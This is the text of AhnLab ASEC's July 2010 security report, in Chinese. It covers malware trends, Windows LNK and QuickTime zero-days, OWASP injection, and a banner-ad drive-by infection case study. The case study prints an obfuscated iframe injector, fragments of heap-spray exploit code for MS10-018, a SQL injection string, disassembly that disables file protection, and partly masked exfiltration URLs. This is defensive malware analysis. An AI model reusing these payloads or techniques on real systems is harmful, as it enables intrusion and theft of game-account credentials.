安博士Asec 2010年7月安全报告
-
Upload
ahnlabchina -
Category
Documents
-
view
563 -
download
6
description
Transcript of 安博士Asec 2010年7月安全报告
![Page 1: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/1.jpg)
2010 ASEC Report Vol.07
安博士公司的安全响应中心(ASEC, AhnLab Secur
ity Emergency Response Center)是以病毒分析师
及安全专家组成的全球性安全响应组织。此报告书
是由安博士公司的ASEC制作,且包含每月发生的主
要安全威胁与响应这些威胁的最新安全技术的简要
信息。
详细内容可以在[www.ahn.com.cn]里确认。
ASEC
2010-08-12
![Page 2: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/2.jpg)
I. 本月安全疫情
1. 病毒趋势„„„„„„„„„„„„„„„„„„ 3
2. 安全趋势„„„„„„„„„„„„„„„„„„ 9
3. 网络安全趋势。„„„„„„„„„„„„„„„13
II. 焦点
4. 入侵网站案例研究„„„„„„„„„„„„„„16
![Page 3: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/3.jpg)
1.病毒趋势
本月是韩国发生 7.7 DDoS 攻击事件的一周年,为了防止同样的悲剧再次重演, 我们
特别留意观察了普通的 DDoS 相关病毒及网络流量。在国外,因解析.LNK 文件时的漏
洞被曝光,成了最热门的话题。在韩国发现伪装成金融机构的邮件的变 种,还发现利
用韩国有名 SNS 的病毒。还发现使用 UNICODE 格式文件名的病毒。因该病毒名在
Windows 资源管理器里不会显示,使用双重后缀(*.doc.scr)时格外小心。而且随着
SNS在韩国流行,发现通过 me2DAY和 twitter 来传播的病毒。
■ 回顾 7.7 DDoS 攻击
给韩国互联网造成巨大危害的 7.7 DDoS 攻击已经过一年了。 之后,很多安全厂商为
了防止再次发生新的攻击,极大的提高了响应力度。幸好今年的 7 月份,只发生了小
规模的攻击。但是此次攻击类型与去年攻击完全相同。所以很多媒体也报道了这些情
况。去年攻击再次发生的原因如下:
[图 1-1] 强制赋值 2009 年度的部分
[图 1-1]所示,获取本地时间后,因重新强制赋值 2009 年,所以未修复的系统仍可能
重新进行攻击。如果某些用户未安装杀毒软件来进行查杀或备份已感染的镜像后重新
还原使用,估计以后到此时此刻,虽然微小,但 7.7 DDoS攻击将又会发生。
■ 利用邮件的病毒的变种
7 月份,通过邮件传播的病毒还是最猖獗了。与以往不同的是,过去的病毒是从被感
染系统里收集邮件地址,并向该邮件地址发送添加附件的邮件。但是现在是通过
BotNet 事先收集好大量邮件地址,并向这些邮件地址发送带恶意网址或附加恶意
html 脚本的邮件。被这些病毒感染后,病毒可以成为一个僵尸网络,或下载虚假杀毒
软件或安装后门来窃取用户信息。7 月初,发现很多 6 月份非常猖獗的邮件病毒的变
![Page 4: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/4.jpg)
种。最近最为流行的是伪装成韩国金融机构的邮件病毒,还发现伪装成网上购物来诱
导用户安装病毒的邮件。
[图 1-2] 7 月份, 最为流行的邮件病毒
此外还发现附加 .ZIP 格式的附件来安装虚假杀毒软件的病毒。该病毒的下载器安装
使 用 隐 藏 技 术 的 Rootkit 。 在 Windows 文件夹里新建\PRAGMA(随机 10 位阿
拉伯数字)后,在这里生成 Rootkit 木马,并进行隐藏。与以往的 mass-mailer 稍微不
同,但是还是通过邮件来诱导用户连接恶意网站或点击恶意修改的文件。用户点击邮
件里所包含的可执行文件,办公文件,网址链接时需多加注意。
■ 注意包含 UNICODE 双重后缀
过去有些病毒利用 Windows 资源管理器选项“隐藏已知文件格式的扩展名”来通过邮
件传播双重后缀的病毒。比如‘病毒.doc.scr’,因不显示.scr 扩展名,用户可能误
认为是办公文档,执行该文件。之后,此方法广为人知,病毒制作者也逐渐不再使用
了。最近韩国发现利用 Windows 资源管理器无法正常显示 UNICODE 文件名的漏洞来传
播以下病毒的案例。
![Page 5: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/5.jpg)
[图 1-3] 包含 UNICODE 的病毒文件名
但是在控制台里确认后发现,该文件实际上并不是办公文档,而是后缀为 .SCR 的可
执行文件。因办公文档图标也可以伪装,一般用户无意中会运行此文件。
[图 1-4] 包含 UNICODE 字符串的病毒文件名
因包含双重后缀的文件,一般都使用为恶意目的,所以如遇到此类样本尽量不要打
开,用杀毒软件扫描或上报给安全厂商。
■ 诱导用户的病毒
本月持续发现,把一般用户可能感兴趣的视频,制作成可执行文件来传播的案例。这
些视频可执行文件主要是通过 P2P(peer to peer)服务,网络硬盘,BBS 等来进行 传
播。 这是利用了普通用户下载视频后双击运行文件的习惯。虽然这些视频是可执行文
件,但是因使用流行的视频播放器的图标,很多用户无意中会执行这些文件。如运行
该视频文件,会通过 Windows 自带的播放器来打开自己内部的视频文件,同时安装病
毒。 从结果来看,是用户自己直接执行病毒的。 这样,使用任何人都可能感兴趣的
主题来制作视频, 让用户下载并执行的社会工程学技术在传播病毒时经常被应用。所
以尽量不要双击运行从互联网上下载的视频,需首先打开视频播放器,并使用“打开”
来播放文件对预防病毒有很大的帮助。
■ 伪装成安全产品的病毒
![Page 6: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/6.jpg)
最近发现伪装成韩国杀毒软件的病毒。这些病毒使用韩国杀毒软件的图标,并通过个
人博客来进行传播。
[图 1-5] 使用有名安全缠上的文件名与图标的病毒
如运行该病毒会生成一个文件,并添加为 Windows 服务来实现自启动。因追加安装的
文件属性伪装成国内知名安全厂商的信息,加大了检测难度。为了防止发生此类感
染,安装新软件时尽量从制作该软件的官方网站上下载。
■ 伪装成免费软件的me2day和twitter相关病毒
7 月 30 日上午,发现通过免费软件利用韩国代表性 SNS 网站(me2day, twitter)进行
传播的病毒。这次在韩国发现的免费软件注明是灭蚊程序,但是实际上运行该程序时
会在系统文件夹(C:\windows\system32)里生成 ckass.dll (101,376 字节)的 DLL 文
件。
[图 1-6] 伪装韩国免费软件的病毒
如下图所示,所生成的 DLL 文件试图连接 me2day 和 twitter 账户的特定网页,连接成
功后通过该 twitter账户的 twitter消息来从其他系统中下载文件并执行。
![Page 7: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/7.jpg)
[图 1-7] me2day 案例
[图 1-8] twitter 案例
但是实际测试时该系统中已不存在相关恶意文件,而且 2010 年 5 月以后并不存在其他
twitter 指令,估计该 twitter 账户已不再使用了。这次发现的伪装韩国免费软件,
并通过 me2day 和 twitter 来传达恶意指令的病毒在 V3里以如下诊断名来查杀。
Dropper/Twitbot.494080
Win-Trojan/Agent.101376.DG
![Page 8: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/8.jpg)
2. 安全趋势
■ Windows操作系统的远程代码执行漏洞(CVE-2010-2568)
本月发现新的 0-day 攻击漏洞是远程代码执行漏洞 CVE-2010-2568。该漏洞存在于
“Windows Shell”组件中,当受影响系统用户点击或者 Windows Shell 试图加载经过
精心构造的恶意快捷方式图标时,由于 Windows Shell 没有正式验证指定的参数,可
导致恶意代码在本地运行。此漏洞极有可能通过移动存储设备的方式加以利用。当用
户通过 Windows Explorer 或其它类似程序打开包含了利用此漏洞的恶意快捷方式的移
动存储设备时,恶意代码将被执行。同时,攻击者也可以创建一个网络共享,并且在
共享文件夹中放置恶意快捷方式。
[图 2-1] Windows 操作系统的远程代码执行漏洞包含的快捷方式
因为该漏洞目前没有发布系统补丁,所以可以在以下注册表位置删除快捷方式的。删
除之前最好先备份后再进行操作。
HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler
详细的信息可以参照 MS 安全公告问1.
■利用Web自动化应用程序漏洞的UNIX/Linux IRCBot传播
最近在网络上出现利用 Web 自动化应用程序漏洞的 UNIX/LINUX IRCBot 传播并攻击增
多的趋势。该攻击一般在被挂马的国内外服务器上利用自动化工具或者脚本的方式攻
击 Web服务器等。
目前大家都知道的攻击是 PHP XML RPC Library 代码执行漏洞(CVE-2005-1921)且通
过 CMS Web应用程序知道地 e107 BBCode PHP 代码执行漏洞。
1 http://www.microsoft.com/technet/security/advisory/2286198.mspx
![Page 9: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/9.jpg)
[图 2-2]利用 PHP XML RPC library 代码执行漏洞 攻击数据包
如果 Web 服务器上使用的 Web 应用程序恰好是被 UNIX/LINUX IRCBot 能感染的应用程
序,不仅被感染,而且会攻击其它的系统。UNIX/LINUX IRCBot 代码包含以下的执行
命令和端口扫描还有 DDOS 攻击(tcp/udp flooding, http flooding),所以有必要提
高警惕。
![Page 10: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/10.jpg)
[图 2-3] UNIX IRCBot代码一部分
该攻击不仅仅是 PHP XML RPC, e107 等漏洞,利用其它的 Web应用程序等代码执行漏
洞 或者利用新发现的漏洞 所以感染系统传播可能性非常高。防止该攻击,首先需要
打 Web应用程序漏洞补丁,网络可以考虑使用 IPS/IDS安全装备。
■恶用Quick Time Player 0 – day漏洞恶意代码
海外时间 7 月 30 日 通过安全厂商和媒体发现了,恶用 Apple 开发的 QuickTime
Player 基于栈缓冲溢出漏洞的恶意代码。目前该 QuickTime Player 存在的漏洞
Apple 公司还没及时公开该漏洞的补丁。关联到漏洞的 Secunia 公开了"Secunia
Advisory SA40729 QuickTime Player Streaming Debug Error Logging Buffer
Overflow"安全公告文。
本月发现的恶用 0-day 漏洞的恶意代码具有 MOV 扩展名的视频文件,而且都伪装成最
近人气很高的影视文件。
[图 2-4]有名影视文件名的方式伪装的 mov 文件
![Page 11: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/11.jpg)
该影视文件一旦被执行,跟下面图片一样 以后门方式执行 Internet Explorer 后,
在指定的系统下载文件。
[图 2-5] 执行 mov 文件后以后门方式试图访问 Internet Explorer
下载的 Music_Installer.exe (208,896 字节)文件被执行后,在被感染的系统上泄露
硬件信息和个人信息传送到外部。
[图 2-6] 通过具有漏洞的 QuickTime Player 下载的恶意代码
目前 ASEC 针对本次利用 0-day 和恶用的恶意代码,正在详细分析中,恶用漏洞的恶意
代码在我们 V3系列中诊断名为如下:
Win-Trojan/Quicktm
Win-Trojan/MDrop.208896
![Page 12: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/12.jpg)
ASEC 分析到现在所掌握的是利用该漏洞并恶用的恶意代码出现的次数不是很多,但是
Apple 公司发布该漏洞补丁为止,具有 mov 扩展名的影视文件用 QuickTime Player 播
放时 需要用户谨慎 小心。
![Page 13: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/13.jpg)
3. 网络安全趋势
■ OWASP 2010 TOP1 从本期开始对 Vol.6大体浏览过的 OWASP 2010
Top10,一一详细的看一下。首先看一下 OWASP 2010 Top1 注入(Injection)攻击。
通过下面的图可以了解到注入攻击的主要事项。
[图 3-1] 被薄弱版本的 QuickTime Player 所下载的恶性代码
1) 主要内容
Threat Agents(攻击者) :包括内、外部使用者和管理员,对系统发出不够信任数
据的发者
Attack Vectors(攻击路径) :攻击者会发送把解释语句转变为恶用的简单的文档。
大部分数据都包括内部代码,可以被用为注入攻击路径。所以注入经常被利用为攻击
手段(Exploitability EASY)
Security Weakness(安全漏洞) :注入的缺点在于一个应用程序用解释器发送一个
不可靠的数据。这个缺点很普通,SQL,LDAP,XPath,OS命令语,程序接受 等情况
下也会发生。通过检查代码很容易发现注入缺点,但是通过测试是很难找到。Scaner
和 Fuzzer对查找缺点有很大帮助。于是,安全漏洞一般被认为是普通程度
(Prevaience COMMON),诊断程度为普通(Detectability AVERAGE)。
Technical Impacts(技术影响) :注入攻击的结果一般会是损失数据、可说明性或
者拒绝服务 等等。偶尔被注入的用户完全被控制。所以商业影响力也很大(Impact
SEVERE)。
Business
Impacts(商业影响力) :要考虑受影响的数据和解释器所运营的 platform 的商业价
值。大家要注意如果所有数据被盗、被改或者删除的时候大家的名声也会遭受打击。
2) 注入攻击实例
这个应用程序制作以下薄弱的 SQL语句的时候使用不可靠的数据。
String query = “SELEC * FROM accounts WHERE custID = ” +
request.getParameter(“id”) + “”;
攻击者在浏览器中修改‘id’为‘or’1‘=’1. 结果从原来的修改客户帐号,改变为
返回所有记录。
![Page 14: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/14.jpg)
http://example.com/app/accountview?id=’or’1’=’1
最糟糕的情况是攻击者可以利用这个漏洞,呼叫数据库里的 Stored
Procedure来完全可以控制 host。
3) 对应
想要防止注入,必须要分离不可靠的数据语句和请求。
A. 通常使用的方法
a. 禁用解释器的使用
b. 使用 interface 提供的安全的 API
c. 特别注意像 Stored Procedures 这种可以导致注入的 API
B. 不能使用 API的情况
a. 区分 Escape,慎重处理特殊文字
下面是相关资料,希望对大家有帮助。
[[Reference]]
OWASP
•OWASP SQL Injection Prevention Cheat Sheet
•OWASP Injection Flaws Article
•ESAPI Encoder API
•ESAPI Input Validation API
•ASVS: Output Encoding/Escaping Requirements (V6)
•OWASP Testing Guide: Chapter on SQL Injection Testing
•OWASP Code Review Guide: Chapter on SQL Injection
•OWASP Code Review Guide: Command Injection
External
•CWE Entry 77 on Command Injection
•CWE Entry 89 on SQL Injection
![Page 15: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/15.jpg)
4. 焦点
入侵网站案例研究
■ 通过 Banner 广告网站流布恶性代码实例
周末修改 Windows 正常文件 imm32.dll 的事件频繁发生。通过确认,结果多数
网站流布修改 imm32.dll 文件的恶性代码。通过分析该网站有 2个共同点。
第一, 该网站有下载 2 个恶性脚本的链接。 http://210.***.***.241/hong/ro**.html
http://xdf.*****caiinfo:801/ro**.html
第二, 该网站使用特定 Banner 广告公司提供的 Banner 广告。提供 Banner 广告
的特定广告里有流布恶性代码的恶性脚本,即使使用这种 Banner 广告的
商业没有故意这么做,结果是一样的。
[图 4-1] 被 Banner广告插入的恶性 iframe链接
目前为止被确认 Banner 广告商业有 2个,以下是把上面内容图示化的图
![Page 16: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/16.jpg)
[图 4-2] Banner 广告商业提供的 Banner广告恶性代码流布
从[图 4-2]可以看出,为了流布恶性代码不用刻意去找薄弱的网站也能段时间内流布
很多恶性代码。所以网站管理员即使自己的网站不薄弱,也要详细的检查从外部提供
的 Contents。
为了防止这种事情继续发展,进行了详细分析。
[图 4-3] log***.co.kr 网站主页
[图 4-4] 带恶性脚本的相关脚本
![Page 17: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/17.jpg)
在[图 4-4]可以看到,java 脚本内部包含恶性脚本,并且相关恶性脚本执行时,会连
接到为了安装 patch imm32.dll 的网站。
[解码前]
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x69\x66\x72\x61\x
6d\x65\x77\x69\x64\x74\x68\x3d\x27\x31\x30\x27\x68\[중간생략]\x74\x70[중간생
략]\x32\x33\x33\x2e[중간생략]\x2f\x72
\x6f\[중간생략]\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e");
[解码后]
documentwrite<iframewidth='10'height='1'src='http://211.***.***.241/ro**.html'></iframe>
[表 4-1] 插入的恶性代码解码
从现在开始分析执行解码的 ro**.html时,所进行的详细过程
http://210.***.***.241/hong/ro**.html
L http://210.***.***.241/hong/cool.html
L http://210.***.***.241/hong/i6.htm
L http://210.***.***.241/hong/i7.htm
L http://210.***.***.241/hong/ko1.htm
L http://210.***.***.241/hong/ko2.htm
[表 4-2] 执行 ro**.html 执行时,连接的 URL
先对 cool.htm 进行简单说明, 用 cool.htm 网页的一部分代码来确定 User Agent,
如果 Internet Explorer 版本为 6 – i6.htm, 版本为 7 时, loading i7.htm 文
件。此外 ko1.htm,ko2.htm 基本上会视为 loading。
document.writeln("document.write(\"<iframe src=ko1.htm width=124
height=1><\/iframe>\");");
document.writeln("if(navigator.userAgent.toLowerCase().indexOf(“msie 6")>0){");
document.writeln("document.write(\"<iframe width=126 height=111
src=i6.htm><\/iframe>\");}");
document.writeln("if(navigator.userAgent.toLowerCase().indexOf(“msie 7")>0){");
document.writeln("document.write(\"<iframe src=i7.htm width=126
height=111><\/iframe>\");}");
document.writeln("document.write(\"<iframe src=ko2.htm width=124
height=1><\/iframe>\");");
[表 4-3] cool.htm 一部分代码
![Page 18: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/18.jpg)
cool.htm文件下载的 PC 如果使用 Internet Explorer 版本 6时,如下是分析下载的
i6.htm代码。相关网页所利用的漏洞是 Microsoft Internet Explorer
"iepeers.dll" Use-after-free Vulnerability (MS10-018)。
* 参考网站 :
韩文 : http://www.microsoft.com/korea/technet/security/bulletin/ms10-
018.mspx
英文 : http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx
function
anheiwangmaya(){
OnLyAnHeIWmUp();
var
WoAiAnHeYwM =
document.createElement('bo'+'dy');
WoAiAnHeYwM.addBehavior('#def'+'ault#userData');
document.appendChild(WoAiAnHeYwM);
try
{
for (AnHeYsIzE=0;
AnHeYsIzE<10; AnHeYsIzE++)
{
WoAiAnHeYwM.setAttribute('s',window);
[表 4-4] i6.htm 一部分代码
下面是使用 Internet Explorer 版本 7 时,连接的 i7.htm 代码也像 i6.htm 一样利用
(Microsoft Internet Explorer "iepeers.dll" Use-after-free Vulnerability
(MS10-018))漏洞。
function ahhswm()
{
var d=document.createElement('D'+'IV');
d.addBehavior('#default#userData');
document.appendChild(d);
try{for (i=0;i<10;i++)
{d.setAttribute('s',window);}}
catch(e){}
window.status+='';
}
var memory;
var temptest = decodeURI(',sun,0c0c,sun,0c0c');
var nop=window['unescape'](temptest.replace(/,sun,/g,'%u'));
var SC=sc();
var xcode=code()-SC.length*2;
while(nop['length'] <= xcode) nop+=nop;
nop=nop.substring(0,xcode - SC.length);
![Page 19: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/19.jpg)
memory=new Array();
for(i=0;i<0x100;i++){memory[i]=nop + SC;}
[表 4-5] i7.htm 一部分代码
下面来分析 ko1.htm代码。相关文件时利用 Adobe Flash 漏洞(CVE-2009-1862)。
* 参考网站
: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1862
document.writeln("var ff=new
window[\"ActiveXObject\"]("ShockwaveFlash.ShockwaveFlash");}");
document.writeln("catch(f){}; ");
document.writeln("finally{if(f!=\"[object Error]\"){aabb = \"<iframe src=kof.htm width=123
height=111><\/iframe>\";");
document.writeln("document.write(aabb);}}");
document.writeln("");
[表 4-6] ko1.htm 一部分代码
最后分析 ko2.htm 代码,也可以发现它利用 Microsoft Office Web Components
(Spreadsheet) ActiveX BOF (MS09-043)漏洞。
*参考网站:
韩文 : http://www.microsoft.com/korea/technet/security/bulletin/ms09-
043.mspx
英文 : http://www.microsoft.com/technet/security/bulletin/ms09-043.mspx
到目前为止对恶性脚本文件进行分析,会发现最近所报告的漏洞被恶性代码使用,所
以鉴于这些的话用户不但可以方便使用 PC,也可以在对 PC 发生的安全问题给予重
视。前面的漏洞分析当中,有什么样的漏洞存在会有什么样的感染,从现在开始分析
发布的恶性代码。以前发布的恶性代码整体流程,如下图所示。
![Page 20: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/20.jpg)
[图 4-5] 恶性代码整体流程
1. 以 Exploit 脚本下载 h**p://210.***.***.236/top/x7.exe。
2. 下载的 x7.exe保存到%PROGRAMFILE%\Common Files \SafeDrv.exe,并且执行。
3. 为了掌握感染 PC的现况,手机感染 PC 的一部分信息,并且传送。
☞ 感染PC的信息传送 : http://www.tv****.com(KR)
/count.asp?Mac=[Mac地址]&Os=[OS版本]&Ver=[病毒版本]&Key=[感染计算机里生成的键值]
4. h**p://210.***.***.236/top/s2.exe 下载到%PROGRAMFILE%\s2.exe,并且执行。
5~ 6. 执行 s2.exe 的话,会使用[图 2-7]所示的函数来生成 DLL。
7~8. Patch 之前备份 imm32.dll.log为正常文件,进行对 imm32.dll 的 patch。
9. imm32.dll 是 Windows 系统文件,WFP(Windows File Protection)的监控对象,
s2.exe 在 patch 文件 imm32.dl 之前,在 sfc_os.dll 特定文件使用 1 分钟 WFP 无效的
函数(#5),对文件 imm32.dl WFP 无效化。 LoadLibraryA() : sfc_os.dll의 ImageBase 얻기
00401C81 |. 68 EC614000 push 004061EC ; /FileName = "sfc_os.dll"
00401C86 |. 66:AB stos word ptr es:[edi] ; |
00401C88 |. FF15 34404000 call dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
GetProcAddress() : sfc_os.dll에서 Undocumented API #5의 RVA값 얻기
00401C8E |. 6A 05 push 5 ; /ProcNameOrOrdinal = #5
00401C90 |. 50 push eax |hModule = 76C10000 (sfc_os), sfc_os.dll의 ImageBase
![Page 21: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/21.jpg)
00401C91 |. FF15 30404000 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
SfcFileException() : imm32.dll에 대해서 1분 동안 윈도우 파일 보호(WFP)기능 무력화
00401CC0 |. 50 push eax ; eax = "C:\WINDOWS\system32\imm32.dll")
00401CC1 |. 6A 00 push 0 00401CC3 |. FFD6 call esi ; esi = 76C19496 (sfc_os.#5),
SfcFileException()의 RVA
[表 4-7] 对imm32.dll进行WFP(Windows File Protection)无效化代码
10. 把%SYSTEM%\imm32.dl 备份为%SYSTEM%\imm32.dl.log,来执行 patch 动作。然后
经过 1 分钟,在 Windows 中用 WFP 来保护 patch 的 imm32.dll。就是说,把 patch 的
imm32.dll视为正常的 Windows文件。
[图 4-6] patch的imm32.dll段信息
在[图 4-6]看到的一项 imm32.dll多了一个. .sy32 section, 相关段的功能是,
在特定进程里 patch的 imm32.dll被 loading 时,会自动 loading
GameHack恶性代码 ole.dll 的功能。
11. ole.dll 会盗取特定 Online Game 用户的帐号,并且发送到特定 URL 的功能,这
次发布的 s2.exe 来生成的 ole.dll的帐号盗取对象如下。
www.ha*****.com / www.sev*******online.co.kr / *****uls.ha*****.com / www.p*****.com
st*****word= / st****il= / c*****ail= / l****.bin / l****2.bin / d*****.exe / iexplore.exe
/ ****story.exe
****es.exe / game.exe / launcher.exe
[表 4-8] 盗取账号对象
一般为了盗取 Game Hack 恶性代码所使用的 URL 是被加密的, ole.dll 使用回复
routine来保护 URL。
00BC1058 56 push esi
00BC1059 8B7424 08 mov esi, dword ptr [esp+8] ; 암호화된 URL의 시작 주소
00BC105D 803E 00 cmp byte ptr [esi], 0
00BC1060 74 1C je short 00BC107E
00BC1062 8A06 mov al, byte ptr [esi]
00BC1064 837C24 0C 00 cmp dword ptr [esp+C], 0
00BC1069 50 push eax
00BC106A 74 07 je short 00BC1073
![Page 22: 安博士Asec 2010年7月安全报告](https://reader031.fdocuments.net/reader031/viewer/2022012312/548f82b8b479598e6a8b4e67/html5/thumbnails/22.jpg)
00BC106C E8 8FFFFFFF call 00BC1000
00BC1071 EB 05 jmp short 00BC1078
00BC1073 E8 B4FFFFFF call 00BC102C
00BC1078 8806 mov byte ptr [esi], al ; 복호화된 URL이 저장되는 주소
00BC107A 59 pop ecx
00BC107B 46 inc esi
00BC107C ^ EB DF jmp short 00BC105D
[表 4-9] 恢复rootine
加密 URL :
00BBEF5C]=00BBF37C,(ASCIIs{{8HSSCDDBR39sD4R'4qDSC9DovuvS+\V\sm4BR |8")
恢复 URL :
00BBEF64 00BBF37C ASCII "http://look.mu****.info/luo8212/rcvchenk.asp"
12. Autorun.INF和自身拷贝文件生成到驱动,并且试图扩散。
13. 最后,以自动执行为目的,添加注册表。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explo
rer\Run
SafeDrv="%PROGRAMFILE%\Common Files\SafeDrv.exe"
在前面也提及到,这次事件不是相关网站发生侵害事故来流出恶性代码,而是特定
banner广告网站被侵害,相关网站提供的banner广告里包含发布恶性代码的恶性脚
本。但是用户会误认为自己连接的网站发布恶性代码。
像例子一样,一同运营的网站会很多,提供 banner 广告的网站发生侵害事故,使用
相关 banner广告的网站也会有影响,会误以为就像很多网站同时发生侵害事故流出恶
性代码。所以,各网站管理员不要以“知道不是我的网站就行”的态度,而是要对从
外部所提供的内容要从安全方面进行检讨。还有被恶性代码感染的 PC 时,相关 PC只
要做好安全更新,可以防止被感染。需要检查在 PC 使用的操作系统或应用软件有没
有安全漏洞,安全更新有没有按时进行。